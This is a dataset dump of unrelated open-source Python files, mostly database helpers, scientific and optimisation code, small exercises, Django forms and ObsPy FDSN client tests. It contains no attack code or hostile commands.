\"\\n\\n\" + generate_prompt\n # Ensure the input length fit Codex max input tokens by shrinking the n_shots\n response_dict = generator.generate_one_pass(\n prompts=[(0, prompt)],\n verbose=False\n )\n text_logit_pairs = response_dict[0]\n nsql = max(text_logit_pairs, key=lambda x: x[1])[0]\n db = NeuralDB([{'table': self.dataset, 'title': title}])\n\n # nsql = post_process_sql(\n # sql_str=nsql,\n # df=db.get_table_df(),\n # process_program_with_fuzzy_match_on_db=True,\n # table_title=title\n # )\n\n executor = Executor(self.params, keys=[self.key])\n exec_answer = executor.nsql_exec(nsql, db)\n print('exec_answer=', exec_answer)\n formatted = sqlfluff.fix(nsql.replace('`', ''))\n payload = {\n 'nsql': formatted,\n 'data': exec_answer\n }\n\n return payload\n\n except Exception as e:\n print('an exception e happened =', e)\n return {'error': str(e), 'query': nsql}\n\n\nif __name__ == \"__main__\":\n dataset = pd.read_csv(\"temp.txt\")\n processor = PlotterProcessor(dataset, \"Histogram of Data Scientist salaries\")\n payload = processor.produce_payload()\n","repo_name":"sentient-productions/charter-app","sub_path":"server/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"28753183902","text":"import psycopg2\nimport json\n\n\nclass DBException(Exception):\n pass\n\n\ndef connect(dbname):\n import credentials\n try:\n con = psycopg2.connect(host=credentials.hostname, user=credentials.username, password=credentials.password,\n dbname=credentials.database)\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return con\n\n\ndef create_tables(cur, con):\n # don't create tables here\n # use file postgreSQL_schema.sql to init db\n #\n # you will need to search and replace 'username' in the sql file,\n # replacing it with the role name you use to access the database\n return True\n\n\ndef new_upload(inj_list, cur, con):\n try:\n cur.execute(\"\"\"\n INSERT INTO uploads (\n user_id,\n filename,\n origin, \n upload_time\n )\n VALUES (%s, %s, %s, CURRENT_TIMESTAMP) RETURNING id AS upload_id\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n rows = cur.fetchall()\n return rows[0][0]\n\n\ndef get_random_id(upload_id, cur, con):\n try:\n cur.execute(\"SELECT random_id FROM uploads WHERE id = \" + str(upload_id) + \";\")\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n rows = cur.fetchall()\n return rows[0][0]\n\n\ndef write_mzid_info(peak_list_file_names,\n spectra_formats,\n analysis_software,\n provider,\n audits,\n samples,\n analyses,\n protocol,\n bib,\n upload_id, cur, con):\n try:\n cur.execute(\"\"\"UPDATE uploads SET \n peak_list_file_names = (%s),\n spectra_formats = (%s),\n analysis_software = (%s),\n provider = (%s),\n audits = (%s),\n samples = (%s),\n analyses = (%s),\n protocol = (%s),\n bib = (%s) \n WHERE id = (%s);\"\"\",\n (peak_list_file_names,\n spectra_formats,\n analysis_software,\n provider,\n audits,\n samples,\n analyses,\n protocol,\n bib,\n upload_id))\n con.commit()\n except psycopg2.Error as e:\n raise DBException(e.message)\n return True\n\ndef write_other_info(upload_id, crosslinks, ident_count, ident_file_size, upload_warnings, cur, con):\n try:\n cur.execute(\"\"\"UPDATE uploads SET contains_crosslinks = (%s), ident_count = (%s), ident_file_size = (%s)\n , upload_warnings = (%s)\n WHERE id = (%s);\"\"\", (crosslinks, ident_count, ident_file_size, json.dumps(upload_warnings), upload_id))\n\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n return True\n\n\ndef write_error(upload_id, error_type, error, cur, con):\n try:\n cur.execute(\"\"\"UPDATE uploads SET error_type = %s\n , upload_error = %s\n WHERE id = %s;\"\"\", (error_type, error, upload_id))\n con.commit()\n\n cur.execute(\"DELETE FROM db_sequences WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM peptides WHERE upload_id = '\" + str(upload_id) + \"';\")\n con.commit()\n\n cur.execute(\"DELETE FROM peptide_evidences WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM modifications WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM spectra WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n cur.execute(\"DELETE FROM spectrum_identifications WHERE upload_id = \" + str(upload_id) + \";\")\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n return True\n\n\n# def write_protocols(inj_list, cur, con):\n# return True\n\ndef write_db_sequences(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO db_sequences (\n id,\n accession,\n protein_name,\n description,\n sequence,\n upload_id\n )\n VALUES (%s, %s, %s, %s, %s, %s) \"\"\", inj_list)\n # con.commit()\n #\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_meta_data(*args):\n pass\n\n\ndef write_peptides(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO peptides (\n id,\n seq_mods,\n link_site,\n crosslinker_modmass,\n upload_id,\n crosslinker_pair_id\n )\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_modifications(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO modifications (\n id,\n upload_id,\n mod_name,\n mass,\n residues,\n accession\n )\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_peptide_evidences(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO peptide_evidences (\n peptide_ref,\n dbsequence_ref,\n protein_accession,\n pep_start,\n is_decoy,\n upload_id\n )\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_spectra(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO spectra (\n id, \n peak_list, \n peak_list_file_name, \n scan_id, \n frag_tol, \n upload_id, \n spectrum_ref,\n precursor_mz,\n precursor_charge\n )\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n\n\ndef write_spectrum_identifications(inj_list, cur, con):\n try:\n cur.executemany(\"\"\"\n INSERT INTO spectrum_identifications (\n id,\n upload_id,\n spectrum_id,\n pep1_id,\n pep2_id,\n charge_state,\n rank,\n pass_threshold,\n ions,\n scores,\n exp_mz,\n calc_mz,\n meta1,\n meta2,\n meta3\n ) VALUES (%s, %s, %s, %s, %s, %s, %s, %s , %s, %s, %s, %s, %s, %s, %s)\"\"\", inj_list)\n con.commit()\n\n except psycopg2.Error as e:\n raise DBException(e.message)\n\n return True\n","repo_name":"lars-kolbowski/xiSPEC_ms_parser","sub_path":"PostgreSQL.py","file_name":"PostgreSQL.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"18475479302","text":"import numpy as np\nimport cvxpy\n\n\nclass Parameters:\n def __init__(self):\n # 'N' is number of available technologies\n self.N = 12\n # 'M' is number of available products\n self.M = 6\n # 'A' contains information about how many tonnes of each product we can get by using chosen technology and\n # one tonn of resource, e.g. a_{ij} defines how many tonn of product i we will get by using a j technology\n self.A = np.array([[0.000, 0.000, 0.311, 0.311, 0.000, 0.249, 0.000, 0.372, 0.373, 0.000, 0.000, 0.372],\n [0.265, 0.352, 0.000, 0.000, 0.000, 0.000, 0.211, 0.361, 0.000, 0.265, 0.000, 0.316],\n [0.000, 0.630, 0.420, 0.210, 0.505, 0.000, 0.000, 0.000, 0.000, 0.000, 0.588, 0.000],\n [0.136, 0.000, 0.000, 0.000, 0.328, 0.000, 0.492, 0.000, 0.328, 0.000, 0.273, 0.000],\n [0.577, 0.000, 0.000, 0.462, 0.138, 0.138, 0.277, 0.000, 0.277, 0.231, 0.115, 0.000],\n [0.000, 0.000, 0.243, 0.000, 0.000, 0.584, 0.000, 0.292, 0.000, 0.486, 0.000, 0.292]])\n\n # 'eps' defines amount of waste in tonnes we get from one tonn of resource\n self.eps = np.array([0.022, 0.018, 0.026, 0.017, 0.029, 0.029,\n 0.020, 0.020, 0.022, 0.018, 0.024, 0.020]).reshape((1, self.N))\n\n # 'productivity' defines how much resource in tonnes can be processed by every technology\n self.productivity = np.array([15, 11, 17, 15, 18, 17,\n 13, 14, 20, 21, 24, 19]).reshape((1, self.N))\n self.inv_productivity = np.reciprocal(self.productivity.astype(np.float32))\n # 'plan' defines how many tonnes of each product we shall produce\n self.plan = np.array([135, 125, 150, 110, 150, 100]).reshape((1, self.M))\n # 'T1' available time for the first machine in hours\n self.T1 = 3\n # 'T2' available time for the second machine in hours\n self.T2 = 6\n # 'N1' contains technologies which could work on the first machine\n self.N1 = np.array([1, 2, 3, 4, 5, 6, 7, 8])\n # '__N2' contains technologies which could work on the second machine\n self.__N2 = np.array([8, 9, 10, 11, 12])\n # 'N2_ext' contains indices of technologies which could work only on the second machine\n # 'indices_dict' contains mapping between technology in the N1 and its copy in N2_ext\n self.N2_ext, self.indices_dict = self.__split_technologies()\n self.A_ext = self.__extend_matrix(self.A)\n self.A_ext_norm = np.round(self.A_ext / np.sum(self.A_ext, axis=0), 3)\n self.inv_P = self.__extend_matrix(self.inv_productivity)\n self.eps_ext = self.__extend_matrix(self.eps)\n self.N_ext = self.N1.size + self.N2_ext.size\n\n def __split_technologies(self):\n \"\"\" Gets number of technologies which could work on both machines\n and stores them in dictionary, where key is a number of such technologies\n and value it corresponding index of \"duplicated technology\".\n \"\"\"\n intersections = set.intersection(set(self.N1), set(self.__N2))\n new_indices = np.arange(self.N + 1, self.N + len(intersections) + 1)\n n2_ext = np.append(list(set(self.__N2) - set(self.N1)), new_indices)\n indices_dict = {list(intersections)[i]: new_indices[i] for i in range(0, len(intersections))}\n return n2_ext, indices_dict\n\n def __extend_matrix(self, mat):\n \"\"\" Duplicates information about technologies which\n could be run on both machines\n \"\"\"\n if mat.shape[1] != self.N:\n raise ValueError(\"Matrix has wrong amount of columns!\")\n mat_ext = mat.copy()\n for i in self.indices_dict.keys():\n mat_ext = np.c_[mat_ext, mat_ext[:, i - 1]]\n return mat_ext\n\n def __check_variables_shape(self, x):\n if x.shape != (1, self.N_ext):\n raise ValueError(\"Variables has wrong shape\")\n\n def get_time_values(self, x, technologies_indices):\n return cvxpy.multiply(x[:, technologies_indices - 1],\n self.inv_P[:, technologies_indices - 1])\n\n def get_time_1_values(self, x):\n self.__check_variables_shape(x)\n return self.get_time_values(x, self.N1)\n\n def get_time_2_values(self, x):\n self.__check_variables_shape(x)\n return self.get_time_values(x, self.N2_ext)\n\n def get_time(self, x, technologies_indices):\n self.__check_variables_shape(x)\n return cvxpy.sum(cvxpy.multiply(x[:, technologies_indices - 1],\n self.inv_P[:, technologies_indices - 1]))\n\n def get_time_1(self, x):\n self.__check_variables_shape(x)\n return self.get_time(x, self.N1)\n\n def get_time_2(self, x):\n self.__check_variables_shape(x)\n return self.get_time(x, self.N2_ext)\n\n def total_productivity(self, x):\n self.__check_variables_shape(x)\n return self.A_ext @ x.T\n","repo_name":"anastasia-spb/misis_smriz","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37738623180","text":"# -*- coding: utf-8 -*-\nfrom bda.plone.orders.tests import Orders_INTEGRATION_TESTING\nfrom plone.testing import layered\nfrom plone.testing.zca import UNIT_TESTING\n\nimport doctest\nimport pprint # noqa\nimport unittest\n\n\noptionflags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS\n\nTESTFILES = [\n (\"dynamicmailtemplate.rst\", UNIT_TESTING),\n (\"dynamicmaillibrary.rst\", Orders_INTEGRATION_TESTING),\n]\n\n\ndef test_suite():\n return unittest.TestSuite(\n [\n layered(\n doctest.DocFileSuite(\n filename, optionflags=optionflags, globs={\"pprint\": pprint.pprint}\n ),\n layer=layer,\n )\n for filename, layer in TESTFILES\n ]\n )\n","repo_name":"bluedynamics/bda.plone.orders","sub_path":"src/bda/plone/orders/tests/test_doctests.py","file_name":"test_doctests.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"5452917527","text":"import cv2\nimport os\n\nface_cascade=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ncam=cv2.VideoCapture(0)\ni=1\nwhile i<101:\n ret,frame=cam.read()\n if ret:\n gray=cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces=face_cascade.detectMultiScale(gray, 1.3, 5)\n for x,y,w,h in faces:\n cv2.imwrite('dataset/rohan/Rohan_'+str(i)+'.jpg',gray[y:y+h,x:x+w])\n i+=1 \n else:\n print('camera not working')\ncam.release()\ncv2.destroyAllWindows() \n","repo_name":"harshtitoria/Face-Recognition","sub_path":"face_data.py","file_name":"face_data.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29740306301","text":"gcc = Environment(CCFLAGS=['-Wall', '-g'])\n\nclang = Environment(CXX='clang++', \n\tCCFLAGS=['-Wall', '-g'])\n\n# in GCC address sanitizer includes also leak sanitizer\ngcc_address = gcc.Clone(CCFLAGS=['-fsanitize=address'],\n\tLINKFLAGS=['-fsanitize=address'])\n\nclang_memory = clang.Clone()\nclang_memory.Append(CCFLAGS=['-fsanitize=memory'],\n\tLINKFLAGS=['-fsanitize=memory'])\n\ngcc_address.Program('address.cpp')\nclang_memory.Program('memory.cpp')\n\n# catch2 is expected to be installed\ncatch = gcc_address.Clone()\n\ncatch.Program('samples.cpp')\n","repo_name":"sansajn/test","sub_path":"c++/sanitizers/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"41267779447","text":"#SOAL STEP ON NUMBER\ndef steponNumber(list_number):\n list_output = []\n #cek criteria\n for i in list_number:\n x = i[0] #koordinat x\n y = i[1] #koordinat y\n\n #jika x atau y negatif\n if x < 0 or y < 0 : \n output = 'No Number' \n list_output.append(output) #tambahkan ke list output (list output di bawah di skip karena menggunakan continue)\n continue #skip ke next loop\n\n # kriteria garis diagonal (x dan y sama) dan (x - y = 2)\n elif x - y == 0 or x - y == 2:\n if x == 0: # jika x & y = 0, output 0\n output = 0\n elif x == 1: # jika x & y = 1, output 1\n output = 1\n elif x % 2 == 0: # jika x & y genap, output x+y\n output = x + y\n else : # jika x & y ganjil, output (x+y)-1\n output = (x + y) - 1\n\n else : #jika bukan koordinat garis diagonal di soal\n output = 'No Number'\n \n list_output.append(output)\n \n return list_output\n\nlist_awal = [[4,2], [6,6], [3,4]]\nprint(steponNumber(list_awal))\n","repo_name":"gustikresna/purwadhika-assignments-exams","sub_path":"modul1_python_programming/step_on_number.py","file_name":"step_on_number.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72783045099","text":"from os import path\nfrom pytest import raises\n\nfrom _sadm.errors import PluginError, PluginScriptNotFound, PluginScriptNoExec\nfrom _sadm.errors import PluginScriptTimeout\nfrom _sadm.utils import scripts\n\nsdir = path.join(path.dirname(path.dirname(path.dirname(__file__))), 'tlib',\n\t'_sadmtest', 'scripts', 'testing', 'testing')\ns = scripts.Scripts('testing', 'testing', sdir = sdir)\n\ndef test_scripts_dir():\n\tassert s._dir == sdir\n\ndef test_noscript():\n\tspath = path.join(sdir, 'noscript.sh')\n\twith raises(PluginScriptNotFound, match = \"PluginScriptNotFound: %s\" % spath) as err:\n\t\ts.run('noscript.sh')\n\tassert err.errisinstance(PluginError)\n\ndef test_run():\n\trc = s.run('testing.sh')\n\tassert rc == 0\n\ndef test_run_error():\n\trc = s.run('testing-error.sh')\n\tassert rc == 1\n\ndef test_run_noexec():\n\tspath = path.join(sdir, 'testing-noexec.sh')\n\twith raises(PluginScriptNoExec, match = \"PluginScriptNoExec: %s\" % spath) as err:\n\t\ts.run('testing-noexec.sh')\n\tassert err.errisinstance(PluginError)\n\ndef test_timeout():\n\tspath = path.join(sdir, 'testing-timeout.sh')\n\tprevttl = scripts._TTL\n\tscripts._TTL = 0.2\n\twith raises(PluginScriptTimeout,\n\t\tmatch = \"PluginScriptTimeout: %s after 0.2 seconds\" % spath) as err:\n\t\ts.run('testing-timeout.sh', '1')\n\tassert err.errisinstance(PluginError)\n\tscripts._TTL = prevttl\n\ndef test_run_args():\n\trc = s.run('testing-args.sh', ('1', '2', '3'))\n\tassert rc == 0\n","repo_name":"jrmsdev/pysadm","sub_path":"t/scripts/plugin_scripts_test.py","file_name":"plugin_scripts_test.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"6630672240","text":"import zoneinfo\nfrom datetime import datetime\nfrom dateutil import tz\n\nif __name__ == '__main__':\n # Eastern time\n et = tz.gettz('America/New_York')\n\n last = datetime(2022, 2, 10, 21, 16, 55, tzinfo=et)\n last2 = datetime(2022, 2, 10, 21, 16, 55, tzinfo=zoneinfo.ZoneInfo('America/Vancouver'))\n last3 = datetime(2022, 2, 10, 21, 16, 55, tzinfo=zoneinfo.ZoneInfo('Europe/Moscow'))\n print(last)\n print(last2)\n print(last3)\n\n","repo_name":"AlekseyKravchuk/coursera_dstructs_and_algorithms_spec","sub_path":"00_experiments/0.49_time_zones.py","file_name":"0.49_time_zones.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14071723349","text":"def file_to_int_list(path):\n list_of_ints = []\n with open(path, \"r\") as f:\n line = f.readline()\n while line:\n list_of_ints.append(int(line))\n line = f.readline()\n return list_of_ints\n\n\none_list = file_to_int_list(\"one.txt\")\ntwo_list = file_to_int_list(\"two.txt\")\n\noverlap_list = [number for number in one_list if number in two_list] # moga poawic sie duplikaty niektorych liczb\n\nzbior1 = set(one_list)\nzbior2 = set(two_list)\n\noverlap = list(zbior1.intersection(zbior2))# tu nie bedzie duplikatów nigdy\noverlap.sort()\n\noverlap_list.sort()\nprint(overlap)\nprint(overlap_list)\n","repo_name":"Gookuruto/Test","sub_path":"pliki/compare_two_files.py","file_name":"compare_two_files.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32707846976","text":"import gymnasium\n# import sumogym\nimport time\nimport pprint\nimport numpy as np\n\nfrom . import joystick\nfrom . import utils\nfrom simple_pid import PID\nfrom typing import List\n\nfrom sumogym.envs.robot_sumo_single import RobotSumoSingleEnv\nfrom simple_pid import PID\nfrom . import joystick\nfrom . import utils\n\n\nenv = RobotSumoSingleEnv(render_mode=\"human\")\nobservation, info = env.reset()\n\npprint.pprint(observation)\npprint.pprint(info)\n\n\nprint(\"\")\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\njoy = joystick.Joystick()\n\n# Constants for mapping joystick values to wheel speeds\nMAX_JOYSTICK_VALUE = 1\nMAX_WHEEL_SPEED = 10\n\n\n# Prepare PID controllers\n\nwheel_controllers: List[PID] = [None]*0\nfor _ in range(2):\n wheel_controllers.append(PID(10, 0.3, 0.0, setpoint=0, sample_time=env.timestep,\n output_limits=[-1, 1]))\n\n\nterminated = False\nwhile not terminated:\n\n # Calculate the wheel speeds\n left_speed_A = (joy.left_axis_y + joy.left_axis_x) * MAX_WHEEL_SPEED / MAX_JOYSTICK_VALUE\n right_speed_A = (joy.left_axis_y - joy.left_axis_x) * MAX_WHEEL_SPEED / MAX_JOYSTICK_VALUE\n\n desired_wheel_velocities = [left_speed_A, right_speed_A]\n\n current_wheel_velocities = observation[\"self_wheel_velocities\"]\n robot_torque_normalised = np.zeros(2)\n for ii, (wheel_controller, current_wheel_velocity, desired_wheel_velocity) in \\\n enumerate(zip(wheel_controllers, current_wheel_velocities , desired_wheel_velocities)): # For each wheel\n wheel_controller.setpoint = desired_wheel_velocity\n robot_torque_normalised[ii] = wheel_controller(current_wheel_velocity)\n action = robot_torque_normalised\n \n\n observation, reward, terminated, truncatation, info = env.step(action)\n\n pprint.pprint(reward)\n pprint.pprint(type(reward))\n\n\n\n# # pprint.pprint(rewards)\n time.sleep(1/240.0)","repo_name":"unigamer/sumogym","sub_path":"sumogym/single_experiment_1.py","file_name":"single_experiment_1.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74315853099","text":"from django.forms import ModelForm, Form\nfrom django.contrib.admin.widgets import AdminFileWidget\nfrom .models import Asset, Check, AssetSignature\nfrom django import forms\nfrom jsignature.forms import JSignatureField\nfrom jsignature.widgets import JSignatureWidget\n\nyears = [x for x in range(2000, 2025)]\n\n\nclass AssetForm(ModelForm):\n class Meta:\n model = Asset\n exclude = ['', ]\n widgets = {'capitalized': forms.SelectDateWidget(years=years)}\n labels = {\n 'descr': 'Description',\n 'add_descr': 'Additional Description',\n }\n\n\nclass Checkin_Form(ModelForm):\n class Meta:\n model = Check\n exclude = ['',]\n labels = {\n 'document': 'Asset Return Form (signed)',\n }\n widgets = {\n 'asset': forms.HiddenInput(),\n 'staff': forms.HiddenInput(),\n 'check_type': forms.HiddenInput(),\n 'document': AdminFileWidget,\n }\n\n\nclass Checkout_Form(ModelForm):\n class Meta:\n model = Check\n exclude = ['',]\n labels = {\n 'document': 'Asset Assignment Form (signed)',\n }\n widgets = {\n 'asset': forms.HiddenInput(),\n 'check_type': forms.HiddenInput(),\n 'document': AdminFileWidget,\n }\n\nclass Signout_Form(ModelForm):\n class Meta:\n model = Check\n exclude = ['signature', 'approval_signature', 'document', 'check_type']\n labels = {'date': 'Date: (YYYY-MM-DD)',}\n\nclass Signout_Signature_Form(ModelForm):\n class Meta:\n model = AssetSignature\n widgets = {'signature': JSignatureWidget, }\n fields = ['signature', ]\n\nclass Signout_Signature_Approved_Form(ModelForm):\n class Meta:\n model = AssetSignature\n widgets = {'signature': JSignatureWidget, }\n fields = ['signature', ]\n\n\n","repo_name":"jameswhitakerwork/mtracker","sub_path":"assets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71880150061","text":"import io\nimport re\nimport sys\nimport warnings\nfrom difflib import Differ\nfrom unittest import mock\n\nimport urllib.request as urllib_request\n\nimport lxml\nimport numpy as np\nimport pytest\nimport requests\n\nfrom obspy import UTCDateTime, read, read_inventory, Stream, Trace\nfrom obspy.core.util.base import NamedTemporaryFile\nfrom obspy.clients.fdsn import Client, RoutingClient\nfrom obspy.clients.fdsn.client import (build_url, parse_simple_xml,\n get_bulk_string)\nfrom obspy.clients.fdsn.header import (DEFAULT_USER_AGENT, URL_MAPPINGS,\n FDSNException, FDSNRedirectException,\n FDSNNoDataException,\n FDSNRequestTooLargeException,\n FDSNBadRequestException,\n FDSNNoAuthenticationServiceException,\n FDSNTimeoutException,\n FDSNNoServiceException,\n FDSNInternalServerException,\n FDSNTooManyRequestsException,\n FDSNNotImplementedException,\n FDSNBadGatewayException,\n FDSNServiceUnavailableException,\n FDSNUnauthorizedException,\n FDSNForbiddenException,\n FDSNDoubleAuthenticationException,\n FDSNInvalidRequestException,\n DEFAULT_SERVICES)\nfrom obspy.core.inventory import Response\nfrom obspy.geodetics import locations2degrees\n\n\nUSER_AGENT = \"ObsPy (test suite) \" + \" \".join(DEFAULT_USER_AGENT.split())\npytestmark = pytest.mark.network\n\n\ndef _normalize_stats(obj):\n if isinstance(obj, Stream):\n for tr in obj:\n _normalize_stats(tr)\n else:\n if \"processing\" in obj.stats:\n del obj.stats[\"processing\"]\n if \"_fdsnws_dataselect_url\" in obj.stats:\n del obj.stats._fdsnws_dataselect_url\n\n\ndef failmsg(got, expected, ignore_lines=[]):\n \"\"\"\n Create message on difference between objects.\n\n If both are strings create a line-by-line diff, otherwise create info on\n both using str().\n For diffs, lines that contain any string given in ignore_lines will be\n excluded from the comparison.\n \"\"\"\n if isinstance(got, str) and isinstance(expected, str):\n got = [line for line in got.splitlines(True)\n if all([x not in line for x in ignore_lines])]\n expected = [line for line in expected.splitlines(True)\n if all([x not in line for x in ignore_lines])]\n diff = Differ().compare(got, expected)\n diff = \"\".join([line for line in diff if line[0] in \"-+?\"])\n if diff:\n return \"\\nDiff:\\n%s\" % diff\n else:\n return \"\"\n else:\n return \"\\nGot:\\n%s\\nExpected:\\n%s\" % (str(got), str(expected))\n\n\ndef normalize_version_number(string):\n \"\"\"\n Returns imput string with version numbers normalized for testing purposes.\n \"\"\"\n match = r'v[0-9]+\\.[0-9]+\\.[0-9]+'\n repl = re.sub(match, \"vX.X.X\", string).replace(\",\", \"\")\n return [line.strip() for line in repl.splitlines()]\n\n\nclass TestClient():\n \"\"\"\n Test cases for obspy.clients.fdsn.client.Client.\n \"\"\"\n @classmethod\n def setup_class(cls):\n cls.client = Client(base_url=\"IRIS\", user_agent=USER_AGENT)\n cls.client_auth = \\\n Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n user=\"nobody@iris.edu\", password=\"anonymous\")\n\n def test_empty_bulk_string(self):\n \"\"\"\n Makes sure an exception is raised if an empty bulk string would be\n produced (e.g. empty list as input for `get_bulk_string()`)\n \"\"\"\n msg = (\"Empty 'bulk' parameter potentially leading to a FDSN request \"\n \"of all available data\")\n for bad_input in [[], '', None]:\n with pytest.raises(FDSNInvalidRequestException, match=msg):\n get_bulk_string(bulk=bad_input, arguments={})\n\n def test_validate_base_url(self):\n \"\"\"\n Tests the _validate_base_url() method.\n \"\"\"\n\n test_urls_valid = list(URL_MAPPINGS.values())\n test_urls_valid += [\n \"http://something.ethz.ch\",\n \"http://example.org\",\n \"https://webservices.rm.ingv.it\",\n \"http://localhost:8080/test/\",\n \"http://93.63.40.85/\",\n \"http://[::1]:80/test/\",\n \"http://[2001:db8:85a3:8d3:1319:8a2e:370:7348]\",\n \"http://[2001:db8::ff00:42:8329]\",\n \"http://[::ffff:192.168.89.9]\",\n \"http://jane\",\n \"http://localhost\",\n \"http://hyphenated-internal-hostname\",\n \"http://internal-machine.private\",\n \"https://long-public-tld.international\",\n \"http://punycode-tld.xn--fiqs8s\"]\n\n test_urls_fails = [\n \"http://\",\n \"http://127.0.1\",\n \"http://127.=.0.1\",\n \"http://127.0.0.0.1\",\n \"http://tld.too.long.\" + (\"x\" * 64)]\n test_urls_fails += [\n \"http://[]\",\n \"http://[1]\",\n \"http://[1:2]\",\n \"http://[1::2::3]\",\n \"http://[1::2:3::4]\",\n \"http://[1:2:2:4:5:6:7]\"]\n\n for url in test_urls_valid:\n assert self.client._validate_base_url(url), \\\n '%s should be valid' % url\n\n for url in test_urls_fails:\n assert not self.client._validate_base_url(url), \\\n '%s should be invalid' % url\n\n def test_url_building(self):\n \"\"\"\n Tests the build_url() functions.\n \"\"\"\n # Application WADL\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"application.wadl\") == \\\n \"http://service.iris.edu/fdsnws/dataselect/1/application.wadl\"\n assert build_url(\"http://service.iris.edu\", \"event\", 1,\n \"application.wadl\") == \\\n \"http://service.iris.edu/fdsnws/event/1/application.wadl\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"application.wadl\") == \\\n \"http://service.iris.edu/fdsnws/station/1/application.wadl\"\n\n # Test one parameter.\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"query\", {\"network\": \"BW\"}) == \\\n \"http://service.iris.edu/fdsnws/dataselect/1/query?network=BW\"\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"queryauth\", {\"network\": \"BW\"}) == \\\n \"http://service.iris.edu/fdsnws/dataselect/1/queryauth?network=BW\"\n # Test two parameters. Note random order, two possible results.\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"query\", {\"net\": \"A\", \"sta\": \"BC\"}) in \\\n (\"http://service.iris.edu/fdsnws/dataselect/1/query?net=A&sta=BC\",\n \"http://service.iris.edu/fdsnws/dataselect/1/query?sta=BC&net=A\")\n\n # A wrong service raises a ValueError\n with pytest.raises(ValueError):\n build_url(\"http://service.iris.edu\", \"obspy\", 1, \"query\")\n\n def test_location_parameters(self):\n \"\"\"\n Tests how the variety of location values are handled.\n\n Why location? Mostly because it is one tricky parameter. It is not\n uncommon to assume that a non-existent location is \"--\", but in reality\n \"--\" is \"<space><space>\". This substitution exists because mostly\n because various applications have trouble digesting spaces (spaces in\n the URL, for example).\n The confusion begins when location is treated as empty instead, which\n would imply \"I want all locations\" instead of \"I only want locations of\n <space><space>\"\n \"\"\"\n # requests with no specified location should be treated as a wildcard\n assert not (\"--\" in build_url(\n \"http://service.iris.edu\", \"station\", 1, \"query\",\n {\"network\": \"IU\", \"station\": \"ANMO\", \"starttime\": \"2013-01-01\"}))\n # location of \" \" is the same as \"--\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \" \"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?location=--\"\n # wildcard locations are valid. Will be encoded.\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"*\"}) == \\\n 